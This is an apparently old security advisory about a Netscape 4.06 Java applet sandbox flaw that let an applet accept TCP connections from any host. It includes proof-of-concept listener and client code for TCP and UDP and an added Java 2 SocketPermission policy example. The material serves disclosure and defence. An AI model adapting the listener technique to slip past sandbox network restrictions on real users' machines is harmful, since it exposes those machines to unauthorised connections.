COMMAND
java
SYSTEMS AFFECTED
java enabled systems
PROBLEM
Tim Wright and alx@acm.org explored the "security hole" in Java
where an applet can listen on a port and accept connections from
any machine, rather than just the machine from which the applet
was downloaded. The server and client code they used follows.
It was tested in Netscape 4.06 for Windows NT. Note that the
machine on which the applet would run is hard-coded into the
client.

// the applet server - listens on the socket
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.*;

/**
 * Applet that listens on TCP port 7000 and logs every peer that connects.
 */
public class SocketListener extends Applet {
    /**
     * Opens the server socket, then loops forever accepting connections.
     */
    public void init() {
        ServerSocket ss;
        try {
            ss = new ServerSocket(7000);
        } catch (IOException ioe) {
            System.err.println("error, cannot create socket");
            return;
        }
        System.err.println("created server socket");
        while (true) {
            try {
                System.err.println("waiting for connection");
                Socket s = ss.accept();
                // The peer address shows whether the connection came from the origin host.
                System.err.println("accepted connection from " + s.getInetAddress());
                BufferedReader pr = new BufferedReader(new InputStreamReader(s.getInputStream()));
                System.err.println("read:" + pr.readLine());
                pr.close();
            } catch (IOException ioe) {
                // Report the failure instead of silently ignoring it.
                System.err.println("IO exception thrown");
            }
        }
    }
}

// the client - connects to the applet's socket
import java.net.*;
import java.io.*;

public class SocketConnector {
    public SocketConnector() {
        super();
    }

    public static void main(java.lang.String[] args) {
        try {
            // Host running the applet, hard-coded as noted above.
            Socket s = new Socket("stl.qucis.queensu.ca", 7000);
            PrintWriter dot = new PrintWriter(s.getOutputStream());
            dot.println("hi there");
            // Flush before closing; otherwise the buffered text is never sent.
            dot.flush();
            s.close();
        } catch (Exception e) {
            System.err.println("exception occurred");
            e.printStackTrace();
        }
    }
}

That's with connection-oriented sockets. What about UDP sockets?
UDP sockets throw an IOException rather than a SecurityException,
but they do exhibit correct behaviour in that incoming packets
from unauthorized places are not accepted. Code is below:

// Server code
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.*;

/**
 * Applet that listens on UDP port 7000 and logs every datagram it receives.
 */
public class SocketListener extends Applet {
    /**
     * Opens the datagram socket, then loops forever receiving packets.
     */
    public void init() {
        DatagramSocket ss;
        try {
            ss = new DatagramSocket(7000);
        } catch (IOException ioe) {
            System.err.println("error, cannot create socket");
            return;
        }
        System.err.println("created server socket");
        while (true) {
            try {
                System.err.println("waiting for connection");
                // 10-byte receive buffer; the declared length must not exceed the buffer size.
                byte[] buf = new byte[10];
                DatagramPacket s = new DatagramPacket(buf, buf.length);
                ss.receive(s);
                System.err.println("accepted connection from " + s.getAddress());
                // Decode only the bytes actually received.
                System.err.println("read:" + new String(s.getData(), 0, s.getLength()));
            } catch (IOException ioe) {
                System.err.println("IO exception thrown");
            }
        }
    }
}

// Client Code
import java.net.*;

/**
 * Sends one UDP datagram to port 7000 on the host named in args[0].
 */
public class SocketConnector {
    public SocketConnector() {
        super();
    }

    public static void main(java.lang.String[] args) {
        try {
            String message = "hi there";
            // Use the encoded byte count, not the character count, as the packet length.
            byte[] payload = message.getBytes();
            DatagramPacket dp = new DatagramPacket(payload, payload.length);
            dp.setPort(7000);
            dp.setAddress(InetAddress.getAllByName(args[0])[0]);
            DatagramSocket ds = new DatagramSocket();
            ds.send(dp);
            ds.close();
        } catch (Exception e) {
            System.err.println("exception occurred");
            e.printStackTrace();
        }
    }
}

SOLUTION
Readers interested in what Java code can and cannot do from a
security perspective should see:
http://www.securingjava.com
Data point: the new Java 2 security model makes no distinction
between applets and applications. The ability of Java code
to open a socket connection can be changed at the discretion
of the VM's security policy manager.
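
The Java 2 permission check behind this behaviour, as an added example that is not part of the original advisory: ServerSocket.accept() asks the security manager for an "accept" SocketPermission on the connecting peer, so a policy granting it only for the origin host rejects other machines. The class name, the two addresses (documentation ranges) and the peer port are assumptions made for the illustration.

```java
import java.net.SocketPermission;
import java.security.PermissionCollection;
import java.security.Permissions;

// Added illustration: evaluates Java 2 SocketPermission grants for the
// accept-from-any-machine case. Addresses are constructed documentation IPs;
// IP literals are used so that no DNS lookup is needed.
public class AcceptPolicyDemo {
    static final String ORIGIN = "192.0.2.10";     // constructed: host the code was loaded from
    static final String STRANGER = "198.51.100.7"; // constructed: unrelated peer

    // Policy that lets the code accept connections only from its origin host.
    static PermissionCollection originOnly() {
        Permissions p = new Permissions();
        p.add(new SocketPermission(ORIGIN + ":1024-", "accept"));
        return p;
    }

    // Over-broad policy: any peer may connect to the listening code.
    static PermissionCollection anyPeer() {
        Permissions p = new Permissions();
        p.add(new SocketPermission("*:1024-", "accept"));
        return p;
    }

    // Mirrors the question asked on accept(): is "accept" granted for
    // this remote address and remote port?
    static boolean mayAccept(PermissionCollection policy, String peerIp, int peerPort) {
        return policy.implies(new SocketPermission(peerIp + ":" + peerPort, "accept"));
    }

    public static void main(String[] args) {
        String[] peers = { ORIGIN, STRANGER };
        for (String peer : peers) {
            System.out.println("origin-only policy, peer " + peer + ": "
                + (mayAccept(originOnly(), peer, 40000) ? "accept" : "deny"));
            System.out.println("any-peer policy,    peer " + peer + ": "
                + (mayAccept(anyPeer(), peer, 40000) ? "accept" : "deny"));
        }
    }
}
```

Only the origin-only grant denies the unrelated peer; the wildcard grant reproduces the accept-from-any-machine behaviour described under PROBLEM.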